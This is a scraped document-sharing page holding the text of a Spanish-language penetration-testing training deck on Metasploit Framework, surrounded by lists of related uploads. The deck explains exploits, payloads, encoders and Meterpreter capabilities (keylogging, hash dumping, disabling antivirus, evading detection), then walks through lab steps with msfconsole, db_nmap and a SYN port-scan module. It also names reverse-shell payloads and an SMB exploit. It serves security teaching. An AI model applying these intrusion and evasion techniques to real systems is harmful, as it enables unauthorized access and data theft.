Ethical hacking 03
 
Manual optix pro v3
Manual optix pro v3Manual optix pro v3
Manual optix pro v3
 
Cómo explotar EternalBlue en Windows Server 2012 R2
Cómo explotar EternalBlue en Windows Server 2012 R2Cómo explotar EternalBlue en Windows Server 2012 R2
Cómo explotar EternalBlue en Windows Server 2012 R2
 
Ethical hacking 01
Ethical hacking 01Ethical hacking 01
Ethical hacking 01
 
Pruebas de intrusion mediante Metasploit Framework
Pruebas de intrusion mediante Metasploit FrameworkPruebas de intrusion mediante Metasploit Framework
Pruebas de intrusion mediante Metasploit Framework
 
Cómo explotar EternalRomance & EternalSynergy en Windows Server 2016
Cómo explotar EternalRomance & EternalSynergy en Windows Server 2016Cómo explotar EternalRomance & EternalSynergy en Windows Server 2016
Cómo explotar EternalRomance & EternalSynergy en Windows Server 2016
 
Ethical hacking 02
Ethical hacking 02Ethical hacking 02
Ethical hacking 02
 
Lliure x guard_es
Lliure x guard_esLliure x guard_es
Lliure x guard_es
 
Ej09.uso segurodewindows7
Ej09.uso segurodewindows7Ej09.uso segurodewindows7
Ej09.uso segurodewindows7
 
Reto Hacker1 2020-2021
Reto Hacker1 2020-2021Reto Hacker1 2020-2021
Reto Hacker1 2020-2021
 
Ps tools
Ps toolsPs tools
Ps tools
 
Manual Bàsic PS Tools
Manual Bàsic PS ToolsManual Bàsic PS Tools
Manual Bàsic PS Tools
 
Explotar Eternalblue & Doublepulsar para obener una shell de Empire/Meterpret...
Explotar Eternalblue & Doublepulsar para obener una shell de Empire/Meterpret...Explotar Eternalblue & Doublepulsar para obener una shell de Empire/Meterpret...
Explotar Eternalblue & Doublepulsar para obener una shell de Empire/Meterpret...
 
Ethical hacking 04a
Ethical hacking 04aEthical hacking 04a
Ethical hacking 04a
 
Linux Kernel - System Calls - Modules - Drivers
Linux Kernel - System Calls - Modules - DriversLinux Kernel - System Calls - Modules - Drivers
Linux Kernel - System Calls - Modules - Drivers
 
Ethical hacking 00a
Ethical hacking 00aEthical hacking 00a
Ethical hacking 00a
 
97 Php. Instalacion De My Sql 4.1 Y Ms Sql 5.0
97 Php. Instalacion De My Sql 4.1 Y Ms Sql 5.097 Php. Instalacion De My Sql 4.1 Y Ms Sql 5.0
97 Php. Instalacion De My Sql 4.1 Y Ms Sql 5.0
 
Análisis técnico de Flashback, el troyano para Mac que ya ha infectado a más ...
Análisis técnico de Flashback, el troyano para Mac que ya ha infectado a más ...Análisis técnico de Flashback, el troyano para Mac que ya ha infectado a más ...
Análisis técnico de Flashback, el troyano para Mac que ya ha infectado a más ...
 

Similar to Cpods training-metasploit

Webinar Gratuito: Metasploit Framework
Webinar Gratuito: Metasploit FrameworkWebinar Gratuito: Metasploit Framework
Webinar Gratuito: Metasploit FrameworkAlonso Caballero
 
Webinar Gratuito "Metasploit Framework"
Webinar Gratuito "Metasploit Framework"Webinar Gratuito "Metasploit Framework"
Webinar Gratuito "Metasploit Framework"Alonso Caballero
 
Metasploit - Bypass UAC fodhelper [Post-explotación]
Metasploit - Bypass UAC fodhelper [Post-explotación]Metasploit - Bypass UAC fodhelper [Post-explotación]
Metasploit - Bypass UAC fodhelper [Post-explotación]Adrián Lois
 
AMENAZAS EN LA RED- METAPLOIT.pptx
AMENAZAS EN LA RED- METAPLOIT.pptxAMENAZAS EN LA RED- METAPLOIT.pptx
AMENAZAS EN LA RED- METAPLOIT.pptxHectorDeJesusTapiaGo
 
Armitage pruebas
Armitage pruebasArmitage pruebas
Armitage pruebasTensor
 
Ethical hacking 02
Ethical hacking 02Ethical hacking 02
Ethical hacking 02Tensor
 
Primera Unidad de los Sistemas Operativos
Primera Unidad de los Sistemas OperativosPrimera Unidad de los Sistemas Operativos
Primera Unidad de los Sistemas OperativosAreli996
 
Sistemas Operativos
Sistemas OperativosSistemas Operativos
Sistemas Operativosguestea15e3
 
Conceptos de programación orientada a objeto
Conceptos de programación orientada a objetoConceptos de programación orientada a objeto
Conceptos de programación orientada a objetoJJ
 
Actividad No. 2.3- Ataque contra contraseñas de sistemas WINDOWS
Actividad No. 2.3- Ataque contra contraseñas de sistemas WINDOWSActividad No. 2.3- Ataque contra contraseñas de sistemas WINDOWS
Actividad No. 2.3- Ataque contra contraseñas de sistemas WINDOWSFrancisco Medina
 
Ejercicios sistemas operativos I
Ejercicios sistemas operativos IEjercicios sistemas operativos I
Ejercicios sistemas operativos IINÉS ARABIA DíAZ
 

Similar to Cpods training-metasploit (20)

Demo Conferencia Tecnológica
Demo Conferencia TecnológicaDemo Conferencia Tecnológica
Demo Conferencia Tecnológica
 
Webinar Gratuito: Metasploit Framework
Webinar Gratuito: Metasploit FrameworkWebinar Gratuito: Metasploit Framework
Webinar Gratuito: Metasploit Framework
 
Webinar Gratuito "Metasploit Framework"
Webinar Gratuito "Metasploit Framework"Webinar Gratuito "Metasploit Framework"
Webinar Gratuito "Metasploit Framework"
 
Metasploit - Bypass UAC fodhelper [Post-explotación]
Metasploit - Bypass UAC fodhelper [Post-explotación]Metasploit - Bypass UAC fodhelper [Post-explotación]
Metasploit - Bypass UAC fodhelper [Post-explotación]
 
AMENAZAS EN LA RED- METAPLOIT.pptx
AMENAZAS EN LA RED- METAPLOIT.pptxAMENAZAS EN LA RED- METAPLOIT.pptx
AMENAZAS EN LA RED- METAPLOIT.pptx
 
Armitage pruebas
Armitage pruebasArmitage pruebas
Armitage pruebas
 
Taller2
Taller2Taller2
Taller2
 
Sad tema2 pen_test_iii
Sad tema2 pen_test_iiiSad tema2 pen_test_iii
Sad tema2 pen_test_iii
 
Ethical hacking 02
Ethical hacking 02Ethical hacking 02
Ethical hacking 02
 
Primera Unidad de los Sistemas Operativos
Primera Unidad de los Sistemas OperativosPrimera Unidad de los Sistemas Operativos
Primera Unidad de los Sistemas Operativos
 
Sistemas Operativos
Sistemas OperativosSistemas Operativos
Sistemas Operativos
 
Conceptos de programación orientada a objeto
Conceptos de programación orientada a objetoConceptos de programación orientada a objeto
Conceptos de programación orientada a objeto
 
Actividad No. 2.3- Ataque contra contraseñas de sistemas WINDOWS
Actividad No. 2.3- Ataque contra contraseñas de sistemas WINDOWSActividad No. 2.3- Ataque contra contraseñas de sistemas WINDOWS
Actividad No. 2.3- Ataque contra contraseñas de sistemas WINDOWS
 
Ejercicios sistemas operativos I
Ejercicios sistemas operativos IEjercicios sistemas operativos I
Ejercicios sistemas operativos I
 
Taller no (1)
Taller no (1)Taller no (1)
Taller no (1)
 
SOFTWARE
SOFTWARESOFTWARE
SOFTWARE
 
Analaisis de malwatre trickbot - mp alonso
Analaisis de malwatre   trickbot - mp alonsoAnalaisis de malwatre   trickbot - mp alonso
Analaisis de malwatre trickbot - mp alonso
 
Plataforma net
Plataforma netPlataforma net
Plataforma net
 
Test de intrusion
Test de intrusionTest de intrusion
Test de intrusion
 
Las funciones de los sistemas operativos
Las funciones de los sistemas operativosLas funciones de los sistemas operativos
Las funciones de los sistemas operativos
 

More from sonia yamile ortega carrillo (8)

Operativos
OperativosOperativos
Operativos
 
Todo bios
Todo biosTodo bios
Todo bios
 
P access7
P access7P access7
P access7
 
Ejercicios
EjerciciosEjercicios
Ejercicios
 
25880774 jtable-mantenimiento-de-datos-en-netbeans-tenemos
25880774 jtable-mantenimiento-de-datos-en-netbeans-tenemos25880774 jtable-mantenimiento-de-datos-en-netbeans-tenemos
25880774 jtable-mantenimiento-de-datos-en-netbeans-tenemos
 
07 arreglos
07   arreglos07   arreglos
07 arreglos
 
G uía 1
G uía 1G uía 1
G uía 1
 
Anuncio
AnuncioAnuncio
Anuncio
 

Cpods training-metasploit

  • 1. Certified Offensive and Defensive Security Professional -CODSP Training Certified Offensive and Defensive Security Professional -CODSP Training (Profesional Certificado en Seguridad Ofensiva y Defensiva) Taller de entrenamiento: Penetration Testing con Metasploit Framework v 1.0 © www.dsteamseguridad.com
  • 2. Certified Offensive and Defensive Security Professional -CODSP Training Fundamentos y conceptos básicos de Explotación y el software Metasploit. ásicos Seguramente muchas personas han escuchado hablar a un amigo, colega, un conferencista, un docente, entre otros, sobre los Frameworks de explotación de vulnerabilidades, y en especial del famoso Framework de explotación llamado Metasploit, y muy seguramente ha entrado algún nivel de curiosidad en lo que respecta al funcionamiento, alcance e impacto que tiene este entorno de trabajo en la seguridad de la información ofensiva. En efecto proyectos como Metasploit han revolucionado la forma en que se realizan las Metasploit auditorías, Test de Penetración y/o pruebas de seguridad a los sistemas de información, ya que su potencia es tal, que personal técnico en el área de las tecnologías de la información sin experiencia en seguridad de la información y/o usuarios mal intencionados pueden hacer uso de Metasploit para realizar pruebas de seguridad de una forma sencilla y causar según el usuario, un buen dolor de cabeza a los administradores de sistemas o por el contrario, presentar importantes alertas de seguridad de forma anticipada, para corregir los agujeros y esentar debilidades de seguridad de un sistema informático. Sin embargo software como Metasploit tiene más positivo que negativo, ya que tener un entorno de trabajo con expl exploits actualizados y listos para ejecutarse, obligan a las empresas desarrolladoras de software a programar y publicar los parches para los agujeros de seguridad que son aprovechados por los diferentes marcos de explotación que existen en el mercado. Como es el caso de Metasploit. es La potencia de Metasploit radica en tre conceptos fundamentales: Facilidad de uso, tres multiplataforma y la comunidad. Facilidad de uso: desde el usuario inexperto y novato en las pruebas de seguridad a sistemas de información, hasta el usuario experto que tiene las capacidades de crear códigos de a explotación, puede hacer uso de todo el potencial de Metasploit como parte esencial de las herramientas que usan para la realización de las pruebas de seguridad a los sistemas informáticos. Multiplataforma: Otra razón de peso para aprovechar todo el potencial de Metasploit, es que : puede ser usado en diferentes sistemas operativos como Linux, Windows, Unix, entre otros, sin perder en ningún momento la potencia del software Metasploit, independiente del sistema independiente operativo que usa el usuario final. La comunidad: Metasploit fue liderado por un experto Hacker llamado HD Moore en el año 2003, sin embargo con el pasar de los años, muchos expertos en desarrollo de códigos de explotación se han sumado a este gran proyecto, con lo que miles de programadores del do mundo en la actualidad programan códigos de explotación de vulnerabilidades y los integran a Metasploit, ayudando así a que la base de datos de exploit en Metasploit, sea de las más completas en el mundo, y se mantenga bien actualizada. n Para comenzar de forma adecuada el estudio, análisis y práctica con el software de explotación Metasploit, es importante conocer la estructura de Metasploit y algunos conceptos base relacionados con la explotación de vulnerabilidades. ón © www.dsteamseguridad.com
  • 3. Certified Offensive and Defensive Security Professional -CODSP Training Metasploit: En su versión Framework, Metasploit es un software de explotación amparado como Software Libre y código abierto, inicialmente escrito en el lenguaje de programación Perl, pero actualmente está escrito en el lenguaje de programación Ruby. A la fecha fue e adquirido por la potente empresa de seguridad llamada Rapid7, y recibe un gran número de solicitud de descargas de forma anual. Vulnerabilidad: Es una debilidad que existe en un sistema operativo, aplicación, dispositiv dispositivos de red, protocolos de red, entre otros, la cual permite a un atacante o auditor de seguridad comprometer la seguridad del sistema o dispositivo de red. Exploit: Es un código, método o vía, que permite a un atacante informático o a un auditor de : seguridad explotar una vulnerabilidad conocida, para poder comprometer la seguridad de un dad sistema informático. A modo informático, Metasploit cuenta con más de 700 códigos de explotación. Payload: Es un código que acompaña y se ejecuta después del código de exp explotación, con el objetivo de poder realmente hacer algo en el sistema de la víctima, por lo regular el código , Payload se usa para realizar una conexión entre el atacante y la victima. Algunos ejemplos de un Payload, seria la conexión a la victima por medio de una Shell de comandos como cmd.exe por ejemplo, o conectarse a la victima usando el protocolo VNC. A modo informático, Metasploit cuenta con más de 250 códigos del tipo Payload. Encoder: Es un componente de metasploit, el cual se usa para generar versiones trasformadas versiones de Payloads. Módulos: Los módulos son pequeños componentes del sistema, donde cada modulo realiza una tarea específica, la cual puede ser llamada en algún momento para integrarse a otros , módulo, y poder hacer así una tarea más representativa de forma completa y compuesta por tativa varios módulos. ShellCode: El shellcode se define como un conjunto de instrucciones que son utilizadas por un Payload cuando el proceso de explotación se ejecuta. Por lo regular en Shellcode está escrito en lenguaje Ensamblador (Assembly). En la mayoría luego de que se ejecute el código je Shellcode se recibe al usuario atacante y/o auditor de seguridad una Shell de comandos. Listener: Un listener es un componente del software Metasploit, el cual queda a la espera de algún tipo de conexión entrante. Un ejemplo de un listener seria cuando una maquina victima ha sido comprometida y se ha dejado algún tipo de puerta trasera o servicio ejecutándose en la maquina víctima, y dicho servicio hace llamados de conexión a la maq maquina atacante de forma periódica para poder lograr de nuevo una intrusión en el equipo víctima. Auxiliar (Auxiliary): Es un modulo de Metasploit Framework, el cual permite hacer tareas adicionales, para resolver problemas específicos, tales como el scanning de puertos, ataques ng por fuerza bruta, entre otros. Arquitectura de Metasploit: La arquitectura modular del software Metasploit, puede verse en : la siguiente gráfica. © www.dsteamseguridad.com
  • 4. Certified Offensive and Defensive Security Professional -CODSP Training Fuente: http://www.offensive http://www.offensive-security.com/metasploit-unleashed/Metasploit_Architecture unleashed/Metasploit_Architecture Analizando un poco el diagrama anterior, se tiene lo siguiente: Libraries (Librerías): Las diferentes librerías son usadas de forma clave para el adecuado funcionamiento de Metasploit, ya que estas son una agrupación de tareas definidas, operaciones y funciones que pueden ser usados por los diversos módulos que componen Metasploit. Una de las Libreríasmás importantes en el Framework de explotaci Metasploit explotación es la Librería Rex, la cual es la base para la mayoría de tareas, ya que dentro de esta librería se encuentran componentes de gran importancia como las implementaciones de los protocolos a nivel de servidor y cliente. Luego se tiene la Librería "MSF Corelibrary", esta librería tiene como funciona principal la implementación de todas las internases requeridas, las cuales permiten el trabajo de forma conjunta con los módulos de explotación, las sesiones, entre otros. Finalmente se encuentra la Librería "Base library", la cual es la encargada de soportar el a trabajo con los diferentes tipos de interfaces a nivel de usuario. Interfaces: El entorno de trabajo de Metasploit, ofrece diferentes tipos de interfaces, cada una de ellas con sus fortalezas y debilidades. Las interfaces son las siguientes: zas Msfconsole: Es una de la partes más populares y reconocidas de Metasploit Framework, ya que es una herramienta del "tipo todo en uno", es una herramienta llena de funcionalidades, en la cual se puede hacer todo tipo de procesos en el Framework, tales como la carga de acer módulos auxiliares, el scanning de una red, procesos de enumeración, creación de listeners y el lanzamiento de un exploit. Es una de las interfaces que mayor apoyo y soporte tiene con el entorno de trabajo de Metasploit. Para ingresar a la interface msfconsle, simplemente basta torno © www.dsteamseguridad.com
  • 5. Certified Offensive and Defensive Security Professional -CODSP Training con abrir una shell de comandos y digitar el comando msfconsole, tal y como se aprecia en la , siguiente imagen. Luego debe de abrirse la interface msfconsole, tal y como se aprecia en la siguiente imagen. Al principio la interface puede parecer un poco compleja, pero a medida que el usuario va conociendo los diferentes comandos, se podrá apreciar la facilidad de trabajo bajo la interfaces msfconsole. Para usar la ayuda dentro de la interface msfconsole, se debe de digitar el a siguiente comando: msfconsole -h Un listado completo de los comandos soportados por la consola msfconsole, puede ser consultado en la siguiente URL: http://www.offensive-security.com/metasploit unleashed/Msfconsole_Commands security.com/metasploit-unleashed/Msfconsole_Commands Msfcli: Es una consola que se ejecuta directamente desde la línea de comandos (Shell). A diferencia de msfconsole, msfscli es una consola más limitada, en la cual de igual forma se una pueden lanzar exploits, configurar módulos auxiliares, entre otros. A pesar de que su uso es limitado frente a msfconsole, msfcli es una interface de gran utilidad para ejecutar tareas tales como: probar nuevos exploits, realizar explotación específica cuando el usuario conoce el r © www.dsteamseguridad.com
  • 6. Certified Offensive and Defensive Security Professional -CODSP Training exploit y las opciones, automatización básica y con scripts, además es adecuado para el aprendizaje de Metasploit Es importante tener presente que msfcli, solo puede manejar una shell o un hilo de conexión a la vez. En la siguiente imagen se podrá ver un ejemplo de uso de msfcli. Msfweb: Es una consola web de fácil uso, del tipo apunte y tire o "Point "Point-and-click". Relativamente ha sido considerada como una consola inestable y de poco uso. Para este modulo del di lomado en seguridad, no se hará uso de este tipo de interface. Armitage: Es una interface grafica a nivel de usuario, creada por Raphael Mudge, la cual posee muchas características y se integra con Metasploit de forma gratuita. Para este modulo el diplomado y/o taller de seguridad no se hará mucho énfasis en Armitage, pero vale la pena que el estudiante luego profundice en esta interface, teniendo presente de forma anticipada el buen manejo de la consola msfconsole, y que esté familiarizado con Metasploit Framework. En el siguiente link se encuentra un interesante curso de puesta en marcha y pruebas con Armitage. http://www.ethicalhacker.net/content/view/379/2/ En la siguiente imagen se puede observar la interface Armi Armitage. © www.dsteamseguridad.com
  • 7. Certified Offensive and Defensive Security Professional -CODSP Training Nota: Para los módulos de explotación y post explotación de este curso de seguridad, vamos a post-explotación basarnos principalmente y en un gran porcentaje en la interface msfconsole. Metasploit Utilities (Utilidades Importantes de Metasploit): Las siguientes u utilidades pueden sernos de mucha ayuda en situaciones específicas que en algún momento se nos presenten al momento que estemos realizando nuestras auditorías de sistemas, y tests de seguridad del tipo Hacking Ético. MsfPayload: Es una utilidad de Metasploit que le permite al usuario final tareas de gran Metasploit importancia tales como: Generar códigos del tipo shellcode, generar archivos ejecutables, para pruebas de infecciones de virustroyanos por ejemplo. Con los las prácticas de laboratorio vistas en el transcurso de este diplomado, veremos que la utilidad msfpayload es de gran curso ayuda para los procesos de explotación del lado cliente (ClientSide). MsfEncode: Los códigos del tipo “Shell code” generados pro msfpayload son totalmente funcionales, sin embargo muchos de estos códigos contienen caracteres nulos, los cuales al ser muchos interpretados por muchos programas, pueden causar que el código no se ejecute de forma completa. Además de que los Shellcode generados muy probablemente lleguen a la victima pasando por redes que estén siendo vigiladas y protegidas por sistemas detectores de intrusos es y software antivirus. Por todas las razones expuestas anteriormente los desarrolladores de Metasploit crearon Msfencode, el cual es una utilidad que ayuda a evitar que el shelshellcode preparada por el auditor informático y/o Pentester, sea indetectable y no contenga caracteres que afecten la ejecución del código antes de tiempo. Metasploit contiene diferentes encoders (Codificador) para diversas situaciones. Para identificar la lista de opciones de la utilidad lista msfencode, se debe de digitar el comando que se aprecia en la siguiente imagen: Uno de los encoders más fiables que contiene Mestaploit, es el encoderx86/shikata_ga_nai, el cual está clasificado como Excelente (Excellent). Para ver un listado de los encoders disponibles, digitar el siguiente comando desde la Shell de Linux Backtrack: msfencode -l © www.dsteamseguridad.com
  • 8. Certified Offensive and Defensive Security Professional -CODSP Training Clasificación de los Exploit y los Payloads en Metasploit Framework: Clasificación de los Exploit: Los códigos de explotación (Exploits) en Metasploit se dividen en explotación dos: Exploit Activos y Exploits Pasivos Exploit Activos: Son códigos de explotación que se ejecuten en la maquina victima de forma completa, incluyendo la finalización del código. Algunos ejemplos de exploits act activos son: ms08_067_netapi smb/psexec Exploit Pasivos: Son códigos de explotación que esperan a que las victimas se conecten a ellos. Por lo regular son los códigos exploits que están del lado del cliente (ClienSide). Clasificación de Payloads: Los códigos del tipo Payload (Carga Útil) en Metasploit dividen en códigos tres: Singles, Stagers, y Stages.Cada uno de ellos posee una gran variedad y pueden aplicarse a diferentes escenarios. Singles: Son tipos de Payloads que son autónomos e independientes, y se ven rep representados en acciones como crear un usuario o abrir la calculadora (calc.exe) en el sistema víctima. Stagers: Son tipos de Payloads diseñados de un modo pequeño y fiables y permiten configurar una conexión de red entre la víctima y el atacante. Stages: Son tipos de Payloads un poco más pesados, y permiten descargar y hacer procesos en el sistema víctima tales como Inyección VNC, Meterpreter, entre otros. Meterpreter (Meta- Interpreter) “Todo en Uno” – El Payload Rey. © www.dsteamseguridad.com
  • 9. Certified Offensive and Defensive Security Professional -CODSP Training Como se verá a lo largo de este curso de seguridad, Metasploit Framework tiene muchos curso Payloads, pero meterpreter es uno de los que más funcionalidades tiene. Meterpreter se . define como una extensión de Metasploit, la cual permite aprovechar al máximo las funcionalidades de Metasploit y aumentar el alcance en lo que respecta a comprometer a aumentar nuestra maquina víctima. También puede definirse como un Payload avanzado. . Dentro de muchas de las funcionalidades y características que nos ofrece Meterpreter se encuentran: • Cargar Un Keylogger(Módulo que graba las pulsaciones en el teclado) en el sistema Keylogger(Módulo victima • La comunicación entre el atacante (Auditor) victima (objetivo de evaluación) es cifrada • Hacer capturas de pantalla(Screenshot) en el sistema victima • Subir y descargar archivos entre el siste sistema víctima y el atacante y/o auditor. • Apagar el sistema victima • Manipular el registro de Windows en el sistema victima (Acceso Lectura/Escritura) • Abrir una Shell de comandos en el sistema victima • Migrar de procesos en el sistema victima • Obtener los Hash de los usuarios del sistema victima e • Pivoting entre subredes en el sistema y/o red victima • Evita la creación de procesos en el sistema victima • Evita la creación de archivos en el disco duro del sistema victima • Es una herramienta que sirve tanto en el proceso de explotación, como en el de postpost- explotación. • Se pueden usar múltiples canales de comunicación entre la víctima y el atacante (Auditor) usando la misma conexión. • Acceso al sistema de archivos en el sistema victima • Ejecución de comandos en el sistema vic victima • Obtener información del sistema victima • Es un Payload estable y altamente flexible • Deshabilitar el software antivirus • Capturar trafico de red en el sistema victima • Y Mucho mas…………………… En la siguiente imagen podemos apreciar una Shell Meterpreter que se le ha dado al usuario atacante y/o auditor de seguridad, luego de que este ha realizado una intrusión exitosa sobre un sistema vulnerable con S.O Windows XP. © www.dsteamseguridad.com
  • 10. Certified Offensive and Defensive Security Professional -CODSP Training Para usar la ayuda de meterpreter, basta con digitar el comando help directamente des la desde consola meterpreter. A medida que avanza el curso de seguridad, veremos cómo utilizar Meterpreter en los procesos de auditorías de seguridad y teste de penetración. Meterpreter será una de las herramientas que más se usa en los procesos de explotación de este curso de seguridad explotación informática. Otros Payloads importantes que se deben manejar y conocer dentro del entorno de trabajo de Metasploit Framework: windows/vncinject/reverse_tcp windows/shell/reverse_tcp windows/shell_bind_tcp Explotación básica con Metasploit Framework Para proceder a realizar el primer proceso de Framework: explotación usando metasploit Framework, se hace necesario tener presente los siguientes conceptos y criterios: • La explotación y la post explotación son las últimas fases de proceso de auditoría de post-explotación seguridad ética (Hacking ético) y/o Test de penetración, por lo que antes de proceder al lanzar el primer proceso de explotación con Metasploit, el estudiante debe de manejar de forma completa las anteriores fases del Hacking Ético tales co como: Recolección de información, Scanning de puertos, Enumeración y Scanning de vulnerabilidades. • El proceso de explotación, se basa en una debilidad crítica identificada en las fases anteriores del Hacking Ético. • La mayoría de procesos de explotación se realizan usando la consola msfconsole, sin embargo haremos uso en algunos procesos de explotación de la consola msfcli. • Para lanzar el primer exploit usando Metasploit Framework, se deben de tener en cuenta los conceptos que se mencionan a continuación, en lo que respecta a en explotación básica. • Tener en cuenta y como referencia los comandos de msfconsole, los cuales se pueden encontrar de forma completa en la siguiente Url: http://www.offensive http://www.offensive- security.com/metasploit-unleashed/Msfconsole_Commands security.com/metasploit Conceptos de explotación básica con Metasploit Framework: teniendo presente que metasploit contiene muchísimos módulos, exploit, auxiliares, payloads, entre otros, se dific dificulta un poco recordar cada uno de los módulos, por lo tanto es importante conocer y practicar sobre los siguientes comandos de la consola msfconsole, para facilitar así el uso de cada uno de los componentes que requeridos para los procesos de explotación: © www.dsteamseguridad.com
  • 11. Certified Offensive and Defensive Security Professional -CODSP Training msf> show exploits: Este comando muestra todos los códigos de explotación que están disponibles en metasploit Framework (La cantidad de exploits depende de la fecha de actualización de metasploit). El anterior comando es de gran importancia, ya que cada d se día descubren nuevas vulnerabilidades, y por consenciente se crean e integran nuevos códigos de explotación a metasploit framework. En la siguiente imagen se puede apreciar un ejemplo de la ejecución de este comando. msf> show auxiliary: Los módulos auxiliares en metasploit, tienen variedad de propósitos, tales como: Scanners de red, Scanners de servicios, fuzzers, entre otros. Por lo tanto la ejecución del comando en mención muestra en pantalla los módulos auxiliares disponibles para metasploit framework. (La cantidad de módulos auxiliares depende de la fecha de work. actualización de metasploit) Prácticas de Laboratorio: Práctica de laboratorio numero 1 Objetivos: Ingresar y hacer uso de las diferentes consolas que ofrece Metasploit, tales como : la msfconsole y la msfcli. Recursos: VMWARE, Metasploit Framework y Backtrack 5 : Ejecución de la práctica de laboratorio 1: Paso 1: Ingresar a Linux Backtrack, y abrir una shell de comandos (Terminal). (Recordar que el : usuario y passqord respectivamente para Backtrack, es root y toor. Luego desde la shell de para comandos digitar startx para entrar al modo grafico) © www.dsteamseguridad.com
  • 12. Certified Offensive and Defensive Security Professional -CODSP Training Paso 2: abrir la consola msfconsole, lo cual se logra digitando el comando msfconsole desde la terminal de comandos de Linux Backtrack Luego que se digite el comando msfconsole, debe de salir lo siguiente: En la anterior imagen se puede apreciar que ya estamos dentro de la interface msfconsole. En el ingreso a la interface, el sistema nos indica la versión de metasploit, el número de exploi exploits, el número de módulos auxiliares, el número de PAYLOADS, entre otros. Anotación: Para ingresar a la interface msfconsole, y a las otras interfaces que nos ofrece metasploit, también lo podemos hacer por el entorno grafico. © www.dsteamseguridad.com
  • 13. Certified Offensive and Defensive Security Professional -CODSP Training Paso 3: digitar el comando msfconsole -h, para poder ver la ayuda de la interface msfconsole Paso 4: salir de la interface msfconsole con el comando exit. Paso 5: Una vez que se tiene una visión general sobre algunas de las interfaces de metasploit, es importante tener presen que el software debe de quedar actualizado a los últimos presente exploits, payloads, módulos auxiliares, entre otros. Para actualizar metasploit, simplemente desde una shell de msfconsole digitamos el comando msfupdate. msfconsole, O también puede hacerse de la interface grafica, tal y como se muestra en la siguiente interface imagen. © www.dsteamseguridad.com
  • 14. Certified Offensive and Defensive Security Professional -CODSP Training Anotación: Para efectos de este taller, ya se entrega Linux Backtrack con Metasploit : actualizado al día. Lo anterior para fines de optimizar tiempos, ya que actualizar metasploit en el equipo e cada estudiante, puede tomar algún tiempo, según la velocidad del canal de Internet en donde se dicta el taller. Es altamente importante, que cuando actualicen metasploit en sus casas, configuren el bloqueador de scripts de firefox en sitio https://metasploit.com, como un sitio seguro, para https://metasploit.com, que no presenten problemas al momento de actualizar metasploit. Práctica de laboratorio numero 2 Objetivos: Verificar la conexión de Metasploit con un sistema de bases de daos, para ir almacenando la información de los host que se están evaluando a nivel de seguridad, en lo que respecta a procesos de scanning de puertos. © www.dsteamseguridad.com
  • 15. Certified Offensive and Defensive Security Professional -CODSP Training Recursos: VMWARE, Metasploit Framework, Windows Server y Backtrack 5 : Observaciones: Antes de proceder a realizar la práctica, verificar que las maquinas Linux Backtrack y Windows 2003 Server están conectados en el mismo segmento de red, y que hay ping entre ambas maquinas. Es altamente importante tener conocimientos básicos medios al respecto de los básicos-medios servicios de red que se están evaluando y próximamente atacando, para comprender próximamente mejor el trabajo de análisis de seguridad y/o penetration testing realizado. Ejecución de la práctica de laboratorio 2: Conexión con una base de datos y Scanning de Puertos Paso 1: Ingresar a la interface msfconsole : Anotación: En versiones anteriores de metasploit se hacía necesario configurar metasploit con una base de datos para poder plasmar de una manera más ordenada los resultados de las actividades que se iban ejecutando en el proceso de pruebas de penetración. Actualmente la penetración. última versión de metasploit solo soporta conexión para base PostgreSQL. Para poder ver el status de conexión de metasploit con la base de datos PostgreSQL se debe de digitar el siguiente comando: db_status Paso 2: digitar el comando db_status, para identificar que metasploit esté conectado a una base de datos llamada msf3dev dev Paso 3: digitar el comando db_nmap dirección IP Target (Windows Server 2003) : Paso 4: digitar el comando hosts para ver los resultados de los host que se tienen guardados en la base de datos. Para el siguiente caso, se tienen dos host. © www.dsteamseguridad.com
  • 16. Certified Offensive and Defensive Security Professional -CODSP Training Anotación: En ocasiones cuando el equipo de trabajo de un proceso de auditoría de seguridad y/o penetration testing es representativo, y se hacen pruebas en diferentes momentos y de lugares distintos, es importante ejecutar nmap de firma directa y guardar los resultados en un , archivo con algún formato en especial, por ejemplo en XML. Paso 5: realizar un scanning de puertos usando nmap, con la opción de exportar los resul : resultados del scanning a un archivo del tipo XML. El scanning de puertos se puede hacer a un solo host, o directamente a toda una subred. Para el caso hacerlo sobre la maquina Windows 2003 Server. Los resultados del anterior proceso de scanning, deberían de ser importados a la base de datos de metasploit. Paso 6: Una vez que se tienen algunos host registrados en la base de datos, con el comando : services, se pueden identificar los servicios que están a la escucha en las maquinas victimas. , © www.dsteamseguridad.com
  • 17. Certified Offensive and Defensive Security Professional -CODSP Training Paso 7: realizar un proceso de Scanning de puertos usando los modulos auxiliares de nmap que zar están dentro de metasploit. Para lograrlo primero debemos de hacer una búsqueda con el na comando search de los módulos auxiliares de metasploit que tiene la función de scanning de puertos, lo cual e logra con el siguiente comando: search portscan Luego se obtiene los siguientes resultados: © www.dsteamseguridad.com
  • 18. Certified Offensive and Defensive Security Professional -CODSP Training Paso 8: Seleccionar el modulo auxiliar de scanning llamado auxiliary/scanner/portscan/syn y seleccionarlo con el comando use de metasploit, tal y como se muestra en el siguiente comando: use auxiliary/scanner/portscan/syn Dar el comando show options para ver las variables que necesita el modulo para poder trabajar. Paso 9: Indicar las variables que se necesita para realizar el scanning de puertos, para el caso : scanning solo vamos a asignar valores a la variable RHOST que es la maquina target victima, a la cual el target-victima, vamos a realizar el scanning de puertos, y vamos a asignarle valores a la variable PORTS, que corresponde a los puertos TCP que vamos a verificar si están abiertos, cerrados o filtrados. Según lo anterior los comandos para asignar los valores para ambas variables son: set RHOST IP de Windows Server set PORTS 25,53,80,110,135,139,445,1433,3389 Paso 9: El último paso es digitar e comando show options para ver que todo está bien, y si no : el hay problemas, entonces de procede a ejecutar el modulo Auxiliar de scanning de puertos con , el comando run © www.dsteamseguridad.com
  • 19. Certified Offensive and Defensive Security Professional -CODSP Training Una vez que se ejecute el modulo auxiliar contra uno de los targets (Objetivos de evaluación), e debe de salir los siguientes resultados (Recordar que las direcciones IP varían de acuerdo a cada target de cada segmento de red de las maquinas virtuales) Ir más allá: Para usuarios más avanzados y/o experimentados con metasploit, que tal si ejecutan el anterior comando, pero colocando un sniffer como wireshark de forma paralela al scanning de puertos, para capturar el tráfico y verificar el tráfico de red para un scanning de puertos del tipo SYN. Práctica de laboratorio numero 3 Objetivos: Identificar y utilizar algunos de los módulos auxiliares que tiene M Metasploit para realizar procesos de scanning de puertos para aplicaciones y/o protocolos específicos tanto a específicos, nivel TCP como para UDP. Recursos: VMWARE, Metasploit Framework, Windows Server 2003, Windows XP y Backtrack , 5 Observaciones: Antes de proceder a realizar la práctica, verificar que las maquinas Linux Backtrack y Windows 2003 Server están conectados en el mismo segmento de red, y que hay ping entre ambas maquinas. Es altamente importante tener 